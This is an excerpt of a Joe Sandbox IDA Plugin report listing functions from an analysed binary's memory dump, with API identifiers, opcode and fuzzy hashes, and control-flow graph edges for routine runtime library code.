                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FormatLibraryLoadMessage
                                                                                                                                                                        • String ID: cannot load module '%s': %s
                                                                                                                                                                        • API String ID: 3853237079-2554058836
                                                                                                                                                                        • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction ID: 1a19da78692ec3c980ec3a6c3c530f79ba538eb7f6b7847e08248d52b6cb69ce
                                                                                                                                                                        • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction Fuzzy Hash: A8F01932A18B8182D710DB59F84021ABB70FBD97D4F600136FA9D83A78EF3CD5A48B00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE07D4E4 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452418845-0
                                                                                                                                                                        • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction ID: 0adc8ac71d415f65334fa72b99fa6d4d02409668de8080936a37b4e7c4cfdd32
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction Fuzzy Hash: 35314F21E1D24346FB54AB6494113B92FA1AFE2748F444639F96ECB6D7FE2CF8248210
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFF8C90 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$QueryVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3696288210-0
                                                                                                                                                                        • Opcode ID: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction ID: f85ef0f291588ccaa54987cf1962206befa4a3bb096067e95ee25e35f72a66cb
                                                                                                                                                                        • Opcode Fuzzy Hash: f4a39bd2c8b4e77c2adc7d5054eb46406d13928e6223299f2622db2b8216fcc4
                                                                                                                                                                        • Instruction Fuzzy Hash: 8821C06161EE4581EB608B19E44062D67A4FB987E4F600335EAAD837F4FF3CE550DB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFEFD90 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 277 7ff6fdfefd90-7ff6fdfefdb6 278 7ff6fdfefdd0-7ff6fdfefde2 277->278 279 7ff6fdfefdb8-7ff6fdfefdc8 277->279 280 7ff6fdfefde4-7ff6fdfefdf6 278->280 281 7ff6fdfefe3c-7ff6fdfefe4f 278->281 279->278 280->281 282 7ff6fdfefdf8-7ff6fdfefdfd 280->282 283 7ff6fdfefe55-7ff6fdfefe68 281->283 284 7ff6fdff004b-7ff6fdff0067 281->284 287 7ff6fdfefe03-7ff6fdfefe15 282->287 288 7ff6fdfefeb0-7ff6fdfefee0 call 7ff6fdfef4a0 282->288 283->284 289 7ff6fdfefe6e-7ff6fdfefe73 283->289 285 7ff6fdff008a-7ff6fdff008f 284->285 286 7ff6fdff0069-7ff6fdff0085 284->286 291 7ff6fdff0091-7ff6fdff00a0 285->291 292 7ff6fdff00fb 285->292 290 7ff6fdff010b-7ff6fdff010f 286->290 287->288 293 7ff6fdfefe1b-7ff6fdfefe3a 287->293 301 7ff6fdfeff78-7ff6fdff0000 call 7ff6fdfef180 * 3 288->301 302 7ff6fdfefee6-7ff6fdfeff0f call 7ff6fdfef4a0 288->302 289->288 294 7ff6fdfefe75-7ff6fdfefe88 289->294 299 7ff6fdff0114-7ff6fdff0131 290->299 291->292 297 7ff6fdff00a2-7ff6fdff00be 291->297 298 7ff6fdff0103-7ff6fdff0107 292->298 293->281 293->288 294->288 300 7ff6fdfefe8a-7ff6fdfefeaa 294->300 297->292 303 7ff6fdff00c0-7ff6fdff00f9 297->303 298->290 304 7ff6fdff0154-7ff6fdff0159 299->304 305 7ff6fdff0133-7ff6fdff014f 299->305 300->284 300->288 334 7ff6fdff0035-7ff6fdff0041 301->334 335 7ff6fdff0002-7ff6fdff002d 301->335 302->301 318 7ff6fdfeff11-7ff6fdfeff24 302->318 303->298 309 7ff6fdff01c5 304->309 310 7ff6fdff015b-7ff6fdff016a 304->310 308 7ff6fdff01d5-7ff6fdff0201 305->308 314 7ff6fdff0203-7ff6fdff0213 308->314 315 7ff6fdff022f-7ff6fdff0238 308->315 313 7ff6fdff01cd-7ff6fdff01d1 309->313 310->309 311 7ff6fdff016c-7ff6fdff0188 310->311 311->309 317 7ff6fdff018a-7ff6fdff01c3 311->317 313->308 314->299 319 7ff6fdff0219-7ff6fdff0229 314->319 320 7ff6fdff024c-7ff6fdff02a0 call 7ff6fdfef250 call 7ff6fdfef2a0 315->320 321 7ff6fdff023a-7ff6fdff0247 call 7ff6fdfe0950 315->321 317->313 323 7ff6fdfeff3b-7ff6fdfeff47 318->323 324 7ff6fdfeff26-7ff6fdfeff39 318->324 319->299 319->315 340 7ff6fdff03b6-7ff6fdff03c3 call 7ff6fdfef2f0 320->340 341 7ff6fdff02a6-7ff6fdff02b5 320->341 321->320 328 7ff6fdfeff4f-7ff6fdfeff73 call 7ff6fdfe0a70 323->328 324->323 324->328 338 7ff6fdff0467-7ff6fdff046e 328->338 334->338 335->334 346 7ff6fdff03c8-7ff6fdff03d3 340->346 342 7ff6fdff02fd-7ff6fdff0302 341->342 343 7ff6fdff02b7-7ff6fdff02f8 call 7ff6fe00e9c0 341->343 347 7ff6fdff0304-7ff6fdff0313 342->347 348 7ff6fdff037d-7ff6fdff0381 342->348 355 7ff6fdff03b1 343->355 350 7ff6fdff03e0-7ff6fdff03e8 346->350 351 7ff6fdff03db call 7ff6fdfef120 346->351 347->348 352 7ff6fdff0315-7ff6fdff0331 347->352 353 7ff6fdff0383-7ff6fdff0394 call 7ff6fe001a40 348->353 354 7ff6fdff0396-7ff6fdff03ac call 7ff6fe022fe0 348->354 350->278 356 7ff6fdff03ee-7ff6fdff040e 350->356 351->350 352->348 357 7ff6fdff0333-7ff6fdff037b call 7ff6fe00e9c0 352->357 353->355 354->355 360 7ff6fdff0465 356->360 361 7ff6fdff0410-7ff6fdff0415 356->361 357->355 360->338 364 7ff6fdff0458-7ff6fdff0460 call 7ff6fdfe8660 361->364 365 7ff6fdff0417-7ff6fdff0454 361->365 364->360 365->364
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $
                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                        • Opcode ID: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                        • Instruction ID: a5e36c477c0874608e553ff2bb0a9472b2898ecbf2a16284b35571f143570022
                                                                                                                                                                        • Opcode Fuzzy Hash: 9843a88858d80629a5392dfe685009a7de1f426911982b70ac98bb5915318121
                                                                                                                                                                        • Instruction Fuzzy Hash: B202D026619B8585DB708B19D48076EB7A0F7C9BB4F504722EABD877E5EE3CE4408B40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFE30A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: \
                                                                                                                                                                        • API String ID: 1452528299-2967466578
                                                                                                                                                                        • Opcode ID: 888c02a4af715df60f1a7dd258da0cc1fa8a9f94b01bbf0f875320e646443852
                                                                                                                                                                        • Instruction ID: 79dd73cb0ffd90cd1062c7095854f82a7d250a4035e6fb3834d602c1a49df6d0
                                                                                                                                                                        • Opcode Fuzzy Hash: 888c02a4af715df60f1a7dd258da0cc1fa8a9f94b01bbf0f875320e646443852
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D51EC32A19B8587DB50DB19E484629B7F0F789BA5F100235EAAD877E8EF3CD441CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE09AD1C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                        • Opcode ID: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction ID: af88eaae56ebb20a808d5e2fa46fdbd4d349826d280dfdf11c49a0c231b30de8
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d4d62a54e9c46130ac50dd2ca8ebd46fd0b951107292fc29c74b2f9e1b698cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 63E04820F0430542EB145B75989537D3A72AFE5741F14943AE86F833DAED3DE4688311
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFF8BB0 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction ID: e24120b3956eeca91131f5c7e16191c21635d9ebaff2f640cf595a924c26133c
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a31b1735084f54a03591de20996a30d0408d625ad59090563f2f3174e9d2cb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 83F01D71629B8182D7209B58E44471A7B71F7887B4F500325E6BE42BE8DF3CD154CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFF8C20 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1225938287-0
                                                                                                                                                                        • Opcode ID: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction ID: c7ecf4391947c18796ca4222728d88431a9f541d734e6f248f8d0597e5a31d05
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5d66f4205355a488102a5330247b632e870741214089924bbcf7827210fdc4
                                                                                                                                                                        • Instruction Fuzzy Hash: A1F01D71629B8186D7209B18E44471ABB71F7887B4F500325F6BE42BE8DF7CD154CB04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFEB7A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-3916222277
                                                                                                                                                                        • Opcode ID: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction ID: 1216a1dacf10a6243ea0b892b72178d8b53d057f40daf4a4bd321ab12dd3c603
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e961bf43056450b91defcd618916dda4355ce4e6050535bdf05ac30be3a137a
                                                                                                                                                                        • Instruction Fuzzy Hash: EC51BA3661968586DB50CB19E08072EB7B0F7C9B94F505126FB9E87BA8EF3DD4418F40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFD5D60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsupr_s
                                                                                                                                                                        • String ID: arg
                                                                                                                                                                        • API String ID: 600324503-2022414218
                                                                                                                                                                        • Opcode ID: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction ID: 00611b877f3c67a4b2cec0059f3e6572b70c3016ef93905061a9fa388643ac21
                                                                                                                                                                        • Opcode Fuzzy Hash: 35be564464d6c4820efd0d8c7376e547ad19c939cfcdb2e341138f1cc7ef3ed0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D313D3160964186D720EB29E44166A73A1FBC97A4F504231FAADC77E9FF3CE9018F40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE0A9550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: try_get_function
                                                                                                                                                                        • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                        • API String ID: 2742660187-2031265017
                                                                                                                                                                        • Opcode ID: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                                                                                                                                        • Instruction ID: c036be58192047c933e59a26f5bfae2a90169891320936301acf70ab64c76461
                                                                                                                                                                        • Opcode Fuzzy Hash: 4833c0902515f3c114d76ba3d1c7fa11a93093573dd0661da56e0bda8c04332a
                                                                                                                                                                        • Instruction Fuzzy Hash: A8E04F92F0860AA1FF0447E9E8811B41621AFF8770E884331F93C8A3E0AE2C99A5C350
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE09B120 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction ID: 260f25653a9f71b1d7b352f15105ecffe3179d42bc16da550b397c066d68e960
                                                                                                                                                                        • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4D51D621B0924A85F7689E26980167E6E91FFE4BB4F444230FD7C877DDEE3CE4618A04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE0AD5D8 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6FE0AD50B,?,?,00000000,00007FF6FE0AD5B3,?,?,?,?,?,?,00007FF6FE09AF6A), ref: 00007FF6FE0AD63E
